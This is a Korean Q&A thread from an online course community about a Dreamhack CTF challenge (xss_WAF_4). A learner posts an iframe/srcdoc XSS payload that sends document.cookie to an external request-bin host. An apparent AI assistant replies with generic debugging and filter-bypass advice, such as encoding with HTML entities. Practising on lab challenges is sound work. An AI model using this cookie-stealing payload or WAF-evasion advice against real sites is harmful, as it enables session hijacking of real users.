인프런 커뮤니티 질문&답변
작성한 질문수
xss_WAF_4가 안 됩니다
작성
·
18
0
<iframe srcdoc = "<script>fetch('https://mamibjs.request.dreamhack.games/?'+document.cookie)</script>">
서버 주소는 드림핵 툴즈 이용했습니다. 스크립트를 위처럼 작성하고 activate admin bot 버튼 누르면 전송이 와야 되는데 안 옵니다. 제가 직접 작성한 글을 클릭해서 하는건 전송이 또 되는데 어드민 봇이 안되는 거 같습니다. 추가로 xss_WAF_3으로도 해봤는데 이것같은 경우는 정상 작동했습니다.
답변 2
1
0
안녕하세요, 인프런 AI 인턴입니다. 신예준님.
XSS-WAF-4 문제에서 iframe과 srcdoc 속성을 사용하여 시도하셨지만, admin bot 버튼을 통해 예상한 전송이 오지 않아 문제를 겪고 계신 것으로 보입니다. XSS 문제를 해결할 때, admin bot이 요청을 인식하지 못하는 경우 다양한 원인이 있을 수 있습니다.
어드민 봇의 실행 여부 확인: 특정 상황에서는 어드민 봇이 자동으로 실행되지 않거나 시간이 오래 걸릴 수 있어 수작업처럼 보일 수 있습니다. 봇의 상태를 확인하여 실제로 활성화되어 있는지 확인해주세요.
스크립트 로직 점검:
srcdoc내에 자바스크립트 태그를 사용하고 있지만, 필터링 설정이나 보안 정책에 의해 실행이 되지 않을 수 있습니다. JavaScript 실행 여부를 확인하기 위해 간단한 알림(alert) 함수 등을 통해 스크립트가 제대로 동작하는지를 점검해 보세요.문자열 인코딩 우회:
iframe요소의 내용이 특정 보안 설정에 의해 필터링될 수 있습니다. HTML 엔티티나 다른 인코딩 방법을 사용하여 필터링을 우회하십시오.
문제 해결에 도움이 될 수 있는 추가적인 접근법이나 사례는 아래의 링크를 통해 확인해 보실 수 있습니다:
위 링크에서 XSS 문제와 관련된 다양한 해결 사례와 주의 사항을 다루고 있으며, 이로 통해 문제 해결에 대한 힌트를 얻을 수 있습니다.
저는 질문자님의 이해를 돕고자 지식공유자님의 기존 답변을 참고하여 유사한 답변 링크를 추천해드리고 있습니다.
현재 베타 기능으로 답변이 만족스럽지 않을 수 있는 점 양해 부탁드립니다. 🙏
추가적으로 궁금한 점이 있으시면, 이어서 질문해 주세요. 곧 지식공유자께서 답변해 주실 것입니다.
해결됐습니다 감사합니다 location도 필터링에 걸려서 location으로 하니까 되네요